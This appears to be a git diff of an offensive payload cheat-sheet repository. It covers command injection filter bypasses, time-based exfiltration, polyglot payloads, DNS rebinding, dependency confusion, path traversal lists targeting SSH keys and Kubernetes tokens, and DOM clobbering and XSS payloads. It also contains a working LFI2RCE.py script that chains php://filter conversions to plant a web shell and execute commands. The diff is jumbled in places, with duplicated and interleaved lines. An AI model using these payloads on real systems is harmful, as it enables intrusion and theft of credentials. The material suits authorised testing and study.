 root:x:0:0:root:/root:/bin/bash
 swissky@crashlab:~$ xxd -r -ps <(echo 2f6574632f706173737764)
 /etc/passwd
 swissky@crashlab:~$ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
 root:x:0:0:root:/root:/bin/bash
 ```
 ### Bypass characters filter
 Commands execution without backslash and slash - linux bash
 ```powershell
 swissky@crashlab:~$ echo ${HOME:0:1}
 /
 swissky@crashlab:~$ cat ${HOME:0:1}etc${HOME:0:1}passwd
 root:x:0:0:root:/root:/bin/bash
 swissky@crashlab:~$ echo . | tr '!-0' '"-1'
 /
 swissky@crashlab:~$ tr '!-0' '"-1' <<< .
 /
 swissky@crashlab:~$ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
 root:x:0:0:root:/root:/bin/bash
 ```
 ### Bypass Blacklisted words
 #### Bypass with single quote
 ```powershell
 w'h'o'am'i
 wh''oami
 ```
 #### Bypass with double quote
 ```powershell
 w"h"o"am"i
 wh""oami
 ```
 #### Bypass with backticks
 ```powershell
 wh``oami
 ```
 #### Bypass with backslash and slash
@@ -131,14 +271,22 @@ w\ho\am\i
 #### Bypass with $@
 `$0`: Refers to the name of the script if it's being run as a script. If you're in an interactive shell session, `$0` will typically give the name of the shell.
 ```powershell
 who$@ami
 echo $0
 -> /usr/bin/zsh
 echo whoami|$0
 ```
 #### Bypass with $()
 ```powershell
 who$()ami
 who$(echo am)i
 who`echo am`i
 ```
 #### Bypass with variable expansion
 ```powershell
@@ -156,31 +304,26 @@ powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
 ```
 ## Challenge
-Challenge based on the previous tricks, what does the following command do:
+## Data Exfiltration
-```powershell
+### Time based data exfiltration
 g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
 ```
 ## Time based data exfiltration
 Extracting data : char by char
 ```powershell
-swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
+swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
 real    0m5.007s
 user    0m0.000s
 sys 0m0.000s
-swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
+swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
 real    0m0.002s
 user    0m0.000s
 sys 0m0.000s
 ```
-## DNS based data exfiltration
+### DNS based data exfiltration
 Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbin.zhack.ca
@@ -199,29 +342,70 @@ Online tools to check for DNS based data exfiltration:
 - dnsbin.zhack.ca
 - pingb.in
-## Polyglot command injection
+
 ## Polyglot Command Injection
 A polyglot is a piece of code that is valid and executable in multiple programming languages or environments simultaneously. When we talk about "polyglot command injection," we're referring to an injection payload that can be executed in multiple contexts or environments.
 * Example 1:
  ```powershell
  Payload: 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
  # Context inside commands with single and double quote:
  echo 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
  echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
  echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
  ```
 * Example 2: 
  ```powershell
  Payload: /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
  # Context inside commands with single and double quote:
  echo 1/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
  echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/"
  echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/'
  ```
 ## Tricks
 ### Backgrounding long running commands
 In some instances, you might have a long running command that gets killed by the process injecting it timing out.
 Using `nohup`, you can keep the process running after the parent process exits.
 ```bash
-1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
+nohup sleep 120 > /dev/null &
 e.g:
 echo 1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
 echo '1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
 echo "1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
 ```
-```bash
+### Remove arguments after the injection
 /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
-e.g:
+In Unix-like command-line interfaces, the `--` symbol is used to signify the end of command options. After `--`, all arguments are treated as filenames and arguments, and not as options.
-echo 1/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
+
-echo "YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/"
+
-echo 'YOURCMD/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/'
+## Labs
 * [OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple)
 * [Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays)
 * [Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection)
 * [Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band)
 * [Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration)
 ## Challenge
 Challenge based on the previous tricks, what does the following command do:
 ```powershell
 g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
 ```
 ## References
 * [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
-* [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)
+* [Bug Bounty Survey - Windows RCE spaceless](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
 * [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628)
 * [#bash #obfuscation by string manipulation - Malwrologist, @DissectMalware](https://twitter.com/DissectMalware/status/1025604382644232192)
 * [What is OS command injection - portswigger](https://portswigger.net/web-security/os-command-injection)
 * [Argument Injection Vectors - Sonar](https://sonarsource.github.io/argument-injection-vectors/)
--- a/Rebinding/README.md
+++ b/Rebinding/README.md
@@ -0,0 +1,76 @@
 # DNS Rebinding
 > DNS rebinding changes the IP address of an attacker controlled machine name to the IP address of a target application, bypassing the [same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy) and thus allowing the browser to make arbitrary requests to the target application and read their responses.
 ## Summary
 * [Tools](#tools)
 * [Exploitation](#exploitation)
 * [Protection Bypasses](#protection-bypasses)
 * [References](#references)
 ## Tools
 - [Singularity of Origin](https://github.com/nccgroup/singularity) - is a tool to perform DNS rebinding attacks.
 - [Singularity of Origin Web Client](http://rebind.it/) (manager interface, port scanner and autoattack)
 ## Exploitation
 First, we need to make sure that the targeted service is vulnerable to DNS rebinding.
 It can be done with a simple curl request:
 ```bash
 curl --header 'Host: <arbitrary-hostname>' http://<vulnerable-service>:8080
 ```
 If the server returns the expected result (e.g. the regular web page) then the service is vulnerable.
 If the server returns an error message (e.g. 404 or similar), the server has most likely protections implemented which prevent DNS rebinding attacks.
 Then, if the service is vulnerable, we can abuse DNS rebinding by following these steps:
 1. Register a domain.
 2. [Setup Singularity of Origin](https://github.com/nccgroup/singularity/wiki/Setup-and-Installation).
 3. Edit the [autoattack HTML page](https://github.com/nccgroup/singularity/blob/master/html/autoattack.html) for your needs.
 4. Browse to "http://rebinder.your.domain:8080/autoattack.html".
 5. Wait for the attack to finish (it can take few seconds/minutes).
 ## Protection Bypasses
 > Most DNS protections are implemented in the form of blocking DNS responses containing unwanted IP addresses at the perimeter, when DNS responses enter the internal network. The most common form of protection is to block private IP addresses as defined in RFC 1918 (i.e. 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16). Some tools allow to additionally block localhost (127.0.0.0/8), local (internal) networks, or 0.0.0.0/0 network ranges.
 In the case where DNS protection are enabled (generally disabled by default), NCC Group has documented multiple [DNS protection bypasses](https://github.com/nccgroup/singularity/wiki/Protection-Bypasses) that can be used.
 ### 0.0.0.0
 We can use the IP address 0.0.0.0 to access the localhost (127.0.0.1) to bypass filters blocking DNS responses containing 127.0.0.1 or 127.0.0.0/8.
 ### CNAME
 We can use DNS CNAME records to bypass a DNS protection solution that blocks all internal IP addresses.
 Since our response will only return a CNAME of an internal server,
 the rule filtering internal IP addresses will not be applied.
 Then, the local, internal DNS server will resolve the CNAME.
 ```bash
 $ dig cname.example.com +noall +answer
 ; <<>> DiG 9.11.3-1ubuntu1.15-Ubuntu <<>> example.com +noall +answer
 ;; global options: +cmd
 cname.example.com.            381     IN      CNAME   target.local.
 ```
 ### localhost
 We can use "localhost" as a DNS CNAME record to bypass filters blocking DNS responses containing 127.0.0.1.
 ```bash
 $ dig www.example.com +noall +answer
 ; <<>> DiG 9.11.3-1ubuntu1.15-Ubuntu <<>> example.com +noall +answer
 ;; global options: +cmd
 localhost.example.com.            381     IN      CNAME   localhost.
 ```
 ## References
 - [How Do DNS Rebinding Attacks Work? - nccgroup, 2019](https://github.com/nccgroup/singularity/wiki/How-Do-DNS-Rebinding-Attacks-Work%3F)
--- a/Confusion/README.md
+++ b/Confusion/README.md
@@ -0,0 +1,32 @@
 # Dependency Confusion
 > A dependency confusion attack or supply chain substitution attack occurs when a software installer script is tricked into pulling a malicious code file from a public repository instead of the intended file of the same name from an internal repository.
 ## Summary
 * [Tools](#tools)
 * [Exploit](#exploitation)
 * [References](#references)
 ## Tools
 * [Confused](https://github.com/visma-prodsec/confused)
 ## Exploit
 Look for `npm`, `pip`, `gem` packages, the methodology is the same : you register a public package with the same name of private one used by the company and then you wait for it to be used.
 ### NPM example
 * List all the packages (ie: package.json, composer.json, ...)
 * Find the package missing from https://www.npmjs.com/
 * Register and create a **public** package with the same name
    * Package example : https://github.com/0xsapra/dependency-confusion-expoit
 ## References
 * [Exploiting Dependency Confusion - 2 Jul 2021 - 0xsapra](https://0xsapra.github.io/website//Exploiting-Dependency-Confusion)
 * [Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies - Alex Birsan - 9 Feb 2021](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
 * [Ways to Mitigate Risk When Using Private Package Feeds - Microsoft - 29/03/2021](https://azure.microsoft.com/en-gb/resources/3-ways-to-mitigate-risk-using-private-package-feeds/)
 * [$130,000+ Learn New Hacking Technique in 2021 - Dependency Confusion - Bug Bounty Reports Explained](https://www.youtube.com/watch?v=zFHJwehpBrU )
--- a/Traversal/Intruder/directory_traversal.txt
+++ b/Traversal/Intruder/directory_traversal.txt
@@ -129,4 +129,12 @@ C:\boot.ini
 /../../../../../../../../../../../boot.ini%00.jpg
 /.../.../.../.../.../
 ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
-/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
+/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
 /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
 /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
 /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
 /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
 /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
 /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
 /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
 /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
--- a/Traversal/README.md
+++ b/Traversal/README.md
@@ -1,19 +1,23 @@
-# Directory traversal
+# Directory Traversal
-> A directory or path traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.
+> Path Traversal, also known as Directory Traversal, is a type of security vulnerability that occurs when an attacker manipulates variables that reference files with “dot-dot-slash (../)” sequences or similar constructs. This can allow the attacker to access arbitrary files and directories stored on the file system.
 ## Summary
 * [Tools](#tools)
 * [Basic exploitation](#basic-exploitation)
-    * [16 bits Unicode encoding](#)
+    * [16 bits Unicode encoding](#16-bits-unicode-encoding)
-    * [UTF-8 Unicode encoding](#)
+    * [UTF-8 Unicode encoding](#utf-8-unicode-encoding)
-    * [Bypass "../" replaced by ""](#)
+    * [Bypass "../" replaced by ""](#bypass--replaced-by-)
-    * [Double URL encoding](#)
+    * [Bypass "../" with ";"](#bypass--with-)
    * [Double URL encoding](#double-url-encoding)
    * [UNC Bypass](#unc-bypass)
    * [NGINX/ALB Bypass](#nginxalb-bypass)
    * [ASPNET Cookieless Bypass](#aspnet-cookieless-bypass)
 * [Path Traversal](#path-traversal)
-    * [Interesting Linux files](#)
+    * [Interesting Linux files](#interesting-linux-files)
-    * [Interesting Windows files](#)
+    * [Interesting Windows files](#interesting-windows-files)
 * [References](#references)
 ## Tools
@@ -55,13 +59,22 @@ We can use the `..` characters to access the parent directory, the following str
 ```
 ### Bypass "../" replaced by ""
-Sometimes you encounter a WAF which remove the "../" characters from the strings, just duplicate them.
+
 Sometimes you encounter a WAF which remove the `../` characters from the strings, just duplicate them.
 ```powershell
 ..././
 ...\.\
 ```
 ### Bypass "../" with ";"
 ```powershell
 ..;/
 http://domain.tld/page.jsp?include=..;/..;/sensitive.txt 
 ```
 ### Double URL encoding
 ```powershell
@@ -70,6 +83,9 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings
 \ = %255c
 ```
 **e.g:** Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with `http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini`
 ### UNC Bypass
 An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
@@ -79,6 +95,40 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software
 ```
 ### NGINX/ALB Bypass
 NGINX in certain configurations and ALB can block traversal attacks in the route, For example:
 ```http://nginx-server/../../``` will return a 400 bad request.
 To bypass this behaviour just add forward slashes in front of the url:
 ```http://nginx-server////////../../```
 ### ASPNET Cookieless Bypass
 When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL by embedding the Session ID directly into it.
 For example, a typical URL might be transformed from: `http://example.com/page.aspx` to something like: `http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx`. The value within `(S(...))` is the Session ID. 
 We can use this behavior to bypass filtered URLs.
 ```powershell
 /admin/(S(X))/main.aspx
 /admin/Foobar/(S(X))/../(S(X))/main.aspx
 /(S(X))/admin/(S(X))/main.aspx
 ```
 ### Java Bypass
 Bypass Java's URL protocol
 ```powershell
 url:file:///etc/passwd
 url:http://127.0.0.1:8080
 ```
 ## Path Traversal
 ### Interesting Linux files
@@ -105,11 +155,25 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software
 /proc/self/cwd/main.py
 /home/$USER/.bash_history
 /home/$USER/.ssh/id_rsa
 /run/secrets/kubernetes.io/serviceaccount/token
 /run/secrets/kubernetes.io/serviceaccount/namespace
 /run/secrets/kubernetes.io/serviceaccount/certificate
 /var/run/secrets/kubernetes.io/serviceaccount
 /var/lib/mlocate/mlocate.db
 /var/lib/plocate/plocate.db
 /var/lib/mlocate.db
 ```
 ### Interesting Windows files
 Always existing file in recent Windows machine. 
 Ideal to test path traversal but nothing much interesting inside...
 ```powershell
 c:\windows\system32\license.rtf
 c:\windows\system32\eula.txt
 ```
 Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
 ```powershell
@@ -133,6 +197,8 @@ c:/unattend.txt
 c:/unattend.xml
 c:/unattended.txt
 c:/unattended.xml
 c:/windows/repair/sam
 c:/windows/repair/system
 ```
 The following log files are controllable and can be included with an evil payload to achieve a command execution
@@ -150,7 +216,23 @@ The following log files are controllable and can be included with an evil payloa
 /var/log/mail
 ```
 ## Labs
 * [File path traversal, simple case](https://portswigger.net/web-security/file-path-traversal/lab-simple)
 * [File path traversal, traversal sequences blocked with absolute path bypass](https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass)
 * [File path traversal, traversal sequences stripped non-recursively](https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively)
 * [File path traversal, traversal sequences stripped with superfluous URL-decode](https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode)
 * [File path traversal, validation of start of path](https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path)
 * [File path traversal, validation of file extension with null byte bypass](https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass)
 ## References
 * [Path Traversal Cheat Sheet: Windows](https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/)
 * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
-* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
+* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
 * [NGINX may be protecting your applications from traversal attacks without you even knowing](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381)
 * [Directory traversal - Portswigger](https://portswigger.net/web-security/file-path-traversal)
 * [Cookieless ASPNET - Soroush Dalili](https://twitter.com/irsdl/status/1640390106312835072)
 * [EP 057 | Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - 30 nov. 2023](https://youtu.be/YlZGJ28By8U)
--- a/Clobbering/README.md
+++ b/Clobbering/README.md
@@ -0,0 +1,132 @@
 # Dom Clobbering
 > DOM Clobbering is a technique where global variables can be overwritten or "clobbered" by naming HTML elements with certain IDs or names. This can cause unexpected behavior in scripts and potentially lead to security vulnerabilities.
 ## Summary
 * [Lab](#lab)
 * [Exploit](#exploit)
 * [References](#references)
 ## Lab
 * [Lab: Exploiting DOM clobbering to enable XSS](https://portswigger.net/web-security/dom-based/dom-clobbering/lab-dom-xss-exploiting-dom-clobbering)
 * [Lab: Clobbering DOM attributes to bypass HTML filters](https://portswigger.net/web-security/dom-based/dom-clobbering/lab-dom-clobbering-attributes-to-bypass-html-filters)
 * [Lab: DOM clobbering test case protected by CSP](https://portswigger-labs.net/dom-invader/testcases/augmented-dom-script-dom-clobbering-csp/)
 ## Exploit
 Exploitation requires any kind of `HTML injection` in the page.
 * Clobbering `x.y.value`
    ```html
    // Payload
    <form id=x><output id=y>I've been clobbered</output>
    // Sink
    <script>alert(x.y.value);</script>
    ```
 * Clobbering `x.y` using ID and name attributes together to form a DOM collection
    ```html
    // Payload
    <a id=x><a id=x name=y href="Clobbered">
    // Sink
    <script>alert(x.y)</script>
    ```
 * Clobbering `x.y.z` - 3 levels deep
    ```html
    // Payload
    <form id=x name=y><input id=z></form>
    <form id=x></form>
    // Sink
    <script>alert(x.y.z)</script>
    ```
 * Clobbering `a.b.c.d` - more than 3 levels
    ```html
    // Payload
    <iframe name=a srcdoc="
    <iframe srcdoc='<a id=c name=d href=cid:Clobbered>test</a><a id=c>' name=b>"></iframe>
    <style>@import '//portswigger.net';</style>
    // Sink
    <script>alert(a.b.c.d)</script>
    ```
 * Clobbering `forEach` (Chrome only)
    ```html
    // Payload
    <form id=x>
    <input id=y name=z>
    <input id=y>
    </form>
    // Sink
    <script>x.y.forEach(element=>alert(element))</script>
    ```
 * Clobbering `document.getElementById()` using `<html>` or `<body>` tag with the same `id` attribute
    ```html
    // Payloads
    <html id="cdnDomain">clobbered</html>
    <svg><body id=cdnDomain>clobbered</body></svg>
    // Sink 
    <script>
    alert(document.getElementById('cdnDomain').innerText);//clobbbered
    </script>
    ```
 * Clobbering `x.username`
    ```html
    // Payload
    <a id=x href="ftp:Clobbered-username:Clobbered-Password@a">
    // Sink
    <script>
    alert(x.username)//Clobbered-username
    alert(x.password)//Clobbered-password
    </script>
    ```
 * Clobbering (Firefox only)
    ```html
    // Payload
    <base href=a:abc><a id=x href="Firefox<>">
    // Sink
    <script>
    alert(x)//Firefox<>
    </script>
    ```
 * Clobbering (Chrome only)
    ```html
    // Payload
    <base href="a://Clobbered<>"><a id=x name=x><a id=x name=xyz href=123>
    // Sink
    <script>
    alert(x.xyz)//a://Clobbered<>
    </script>
    ```
 ## Tricks
 * DomPurify allows the protocol `cid:`, which doesn't encode double quote (`"`): `<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">`
 ## References
 * [Dom Clobbering - PortSwigger](https://portswigger.net/web-security/dom-based/dom-clobbering)
 * [Dom Clobbering - HackTricks](https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/dom-clobbering)
 * [DOM Clobbering strikes back - @garethheyes - 06 February 2020](https://portswigger.net/research/dom-clobbering-strikes-back)
 * [Hijacking service workers via DOM Clobbering - @garethheyes - 29 November 2022](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)
 * [Bypassing CSP via DOM clobbering - @garethheyes - 05 June 2023](https://portswigger.net/research/bypassing-csp-via-dom-clobbering)
--- a/Inclusion/Files/LFI2RCE.py
+++ b/Inclusion/Files/LFI2RCE.py
@@ -0,0 +1,60 @@
 import requests
 url = "http://localhost:8000/chall.php"
 file_to_use = "/etc/passwd"
 command = "id"
 #<?=`$_GET[0]`;;?>
 base64_payload = "PD89YCRfR0VUWzBdYDs7Pz4"
 conversions = {
    'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
    'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
    'C': 'convert.iconv.UTF8.CSISO2022KR',
    '8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
    '9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
    'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
    's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
    'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
    'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
    'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
    'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
    '0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
    'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
    'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
    'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
    'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
    '7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
    '4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
 }
 # generate some garbage base64
 filters = "convert.iconv.UTF8.CSISO2022KR|"
 filters += "convert.base64-encode|"
 # make sure to get rid of any equal signs in both the string we just generated and the rest of the file
 filters += "convert.iconv.UTF8.UTF7|"
 for c in base64_payload[::-1]:
        filters += conversions[c] + "|"
        # decode and reencode to get rid of everything that isn't valid base64
        filters += "convert.base64-decode|"
        filters += "convert.base64-encode|"
        # get rid of equal signs
        filters += "convert.iconv.UTF8.UTF7|"
 filters += "convert.base64-decode"
 final_payload = f"php://filter/{filters}/resource={file_to_use}"
 with open('payload', 'w') as f:
    f.write(final_payload)
 r = requests.get(url, params={
    "0": command,
    "action": "include",
    "file": final_payload
 })
 print(r.text)
--- a/Inclusion/Files/phpinfolfi.py
+++ b/Inclusion/Files/phpinfolfi.py
@@ -1,7 +1,9 @@
 #!/usr/bin/python
 # https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
 # The following line is not required but supposedly optimizes code.  
 # However, this breaks on some Python 2 installations, where the future module version installed is > 0.16.  This can be a pain to revert.
 # from builtins import range
 from __future__ import print_function
 from builtins import range
 import sys
 import threading
 import socket
@@ -51,6 +53,8 @@ def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
        d += s.recv(offset)
    try:
        i = d.index("[tmp_name] =>")
        if i == -1:
            i = d.index("[tmp_name] =&gt;")
        fn = d[i+17:i+31]
    except ValueError:
        return None
@@ -109,6 +113,8 @@ def getOffset(host, port, phpinforeq):
            break
    s.close()
    i = d.find("[tmp_name] =>")
    if i == -1:
        i = d.find("[tmp_name] =&gt;")
    if i == -1:
        raise ValueError("No php tmp_name in phpinfo output")
@@ -191,4 +197,4 @@ def main():
 if __name__=="__main__":
    print("Don't forget to modify the LFI URL")
-    main()
+    main()
--- a/Inclusion/Files/uploadlfi.py
+++ b/Inclusion/Files/uploadlfi.py
--- a/Inclusion/Intruders/Logs-files.txt
+++ b/Inclusion/Intruders/Logs-files.txt
@@ -1 +0,0 @@
 71
--- a/Inclusion/README.md
+++ b/Inclusion/README.md
@@ -1,42 +1,65 @@
 # File Inclusion
-> The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
+> A File Inclusion Vulnerability refers to a type of security vulnerability in web applications, particularly prevalent in applications developed in PHP, where an attacker can include a file, usually exploiting a lack of proper input/output sanitization. This vulnerability can lead to a range of malicious activities, including code execution, data theft, and website defacement.
-> The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application
+**File Inclusion Vulnerability** should be differenciated from **Path Traversal**. The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application, when the File Inclusion will lead to the execution of arbitrary code.
 ## Summary
-* [Tools](#tools)
+- [File Inclusion](#file-inclusion)
-* [Basic LFI](#basic-lfi)
+  - [Summary](#summary)
-    * [Null byte](#null-byte)
+  - [Tools](#tools)
-    * [Double encoding](#double-encoding)
+  - [Local File Inclusion](#local-file-inclusion)
-    * [UTF-8 encoding](#utf-8-encoding)
+    - [Null byte](#null-byte)
-    * [Path and dot truncation](#path-and-dot-truncation)
+    - [Double encoding](#double-encoding)
-    * [Filter bypass tricks](#filter-bypass-tricks)
+    - [UTF-8 encoding](#utf-8-encoding)
-* [Basic RFI](#basic-rfi)
+    - [Path and dot truncation](#path-and-dot-truncation)
-* [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
+    - [Filter bypass tricks](#filter-bypass-tricks)
-  * [Wrapper php://filter](#wrapper-phpfilter)
+  - [Remote File Inclusion](#remote-file-inclusion)
-  * [Wrapper zip://](#wrapper-zip)
+    - [Null byte](#null-byte-1)
-  * [Wrapper data://](#wrapper-data)
+    - [Double encoding](#double-encoding-1)
